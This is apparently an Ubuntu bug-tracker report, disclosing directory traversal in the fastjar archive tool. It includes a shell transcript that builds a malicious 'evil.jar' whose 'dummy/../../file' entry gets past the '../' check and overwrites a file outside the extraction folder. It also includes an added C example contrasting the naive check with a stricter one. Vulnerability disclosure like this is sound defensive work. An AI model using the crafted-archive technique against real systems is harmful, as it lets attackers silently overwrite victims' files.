Directory traversal vulnerabilities
Affects | Status | Importance | Assigned to | Milestone
---|---|---|---|---
fastjar (Ubuntu) | Fix Released | Medium | Marc Deslauriers |
Hardy | Fix Released | Undecided | Unassigned |
Jaunty | Fix Released | Undecided | Unassigned |
Karmic | Fix Released | Undecided | Unassigned |
Lucid | Fix Released | Undecided | Unassigned |
Bug Description
Binary package hint: fastjar
The "fastjar" archive utility, installed on my Linux system as "/usr/bin/fastjar", is
vulnerable to directory traversal vulnerabilities. If an attacker can convince
a victim to extract a malicious .jar file, arbitrary files on disk may be
overwritten without prompting.
fastjar attempts to prevent directory traversal, presumably by checking if the
first several characters of a file included in the .jar archive are "../". For
example (my /usr/bin/jar is a symlink to fastjar):
=======
drosenbe@Dan:~/jar$ touch ../file
drosenbe@Dan:~/jar$ jar cvf evil.jar ../file
adding: META-INF/ (in=0) (out=0) (stored 0%)
adding: META-INF/
adding: ../file (in=129) (out=93) (deflated 27%)
Total:
------
(in = 169) (out = 455) (deflated -169%)
drosenbe@Dan:~/jar$ jar -xvf evil.jar
created: META-INF/
extracted: META-INF/
Traversal to parent directories during unpacking!
=======
However, this can be subverted by creating a dummy folder and traversing from
there, as follows:
=======
drosenbe@Dan:~/jar$ echo "This is an evil file" > ../file
drosenbe@Dan:~/jar$ mkdir dummy
drosenbe@Dan:~/jar$ jar cvf evil.jar dummy/../../file
adding: META-INF/ (in=0) (out=0) (stored 0%)
adding: META-INF/
adding: dummy/../../file (in=21) (out=21) (deflated 0%)
Total:
------
(in = 61) (out = 401) (deflated -557%)
drosenbe@Dan:~/jar$ echo "This is a good file" > ../file
drosenbe@Dan:~/jar$ cat ../file
This is a good file
drosenbe@Dan:~/jar$ jar xvf evil.jar
extracted: META-INF/
inflated: dummy/../../file
drosenbe@Dan:~/jar$ cat ../file
This is an evil file
=======
fastjar also allows the inclusion of full paths as file names, which will be
extracted and overwrite files without prompting. Archive programs such as jar
should take care to ensure that extracted contents remain in the current
directory and do not allow absolute paths or directory traversal, both of which
pose security vulnerabilities.
Please let me know if you have any trouble reproducing this issue or any
questions. I have confirmed that Sun's release of the "jar" utility is also vulnerable
to these issues, and I have contacted their security team.
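The gap between the two transcripts above, shown as an added example (not fastjar's code and not part of the original report): a check that only looks for a leading "../", which is the behaviour the reporter presumes, next to a component-by-component check that also rejects absolute paths. The function names `naive_prefix_check` and `entry_is_safe` and the sample entry names are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Presumed pre-fix behaviour per the report: only a leading "../" is refused.
 * Returns 1 when the name is accepted. */
int naive_prefix_check(const char *name)
{
    return strncmp(name, "../", 3) != 0;
}

/* Returns 1 only if no prefix of the entry name climbs above the extraction
 * directory. Empty names and absolute paths are refused outright. */
int entry_is_safe(const char *name)
{
    int depth = 0;                         /* directories below the root */
    const char *p = name;

    if (*p == '\0' || *p == '/')
        return 0;

    while (*p) {
        size_t len = strcspn(p, "/");      /* length of this component */

        if (len == 2 && p[0] == '.' && p[1] == '.') {
            if (--depth < 0)
                return 0;                  /* ".." escaped the root */
        } else if (!(len == 1 && p[0] == '.')) {
            depth++;                       /* ordinary file or directory name */
        }
        p += len;
        while (*p == '/')                  /* skip one or more separators */
            p++;
    }
    return 1;
}

int main(void)
{
    /* Constructed entry names; the second and third come from the report. */
    const char *names[] = { "META-INF/", "../file", "dummy/../../file",
                            "/abs/path/file", "a/./b/../c", "a/b/../../.." };
    for (size_t i = 0; i < sizeof names / sizeof names[0]; i++)
        printf("%-18s naive=%d strict=%d\n", names[i],
               naive_prefix_check(names[i]), entry_is_safe(names[i]));
    return 0;
}
```

The check is purely lexical: it does not account for symbolic links already present in the extraction directory, which an extractor has to handle separately.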
Changed in fastjar (Ubuntu):
status: New → Confirmed
importance: Undecided → Medium
visibility: private → public
tags: added: patch
Changed in fastjar (Ubuntu):
assignee: nobody → Marc Deslauriers (mdeslaur)
Changed in fastjar (Ubuntu Hardy):
status: New → Confirmed
Changed in fastjar (Ubuntu Lucid):
status: New → Confirmed
Changed in fastjar (Ubuntu Jaunty):
status: New → Confirmed
Changed in fastjar (Ubuntu Karmic):
status: New → Confirmed
Changed in fastjar (Ubuntu):
status: Confirmed → Fix Released
Incomplete fix for CVE-2006-3619?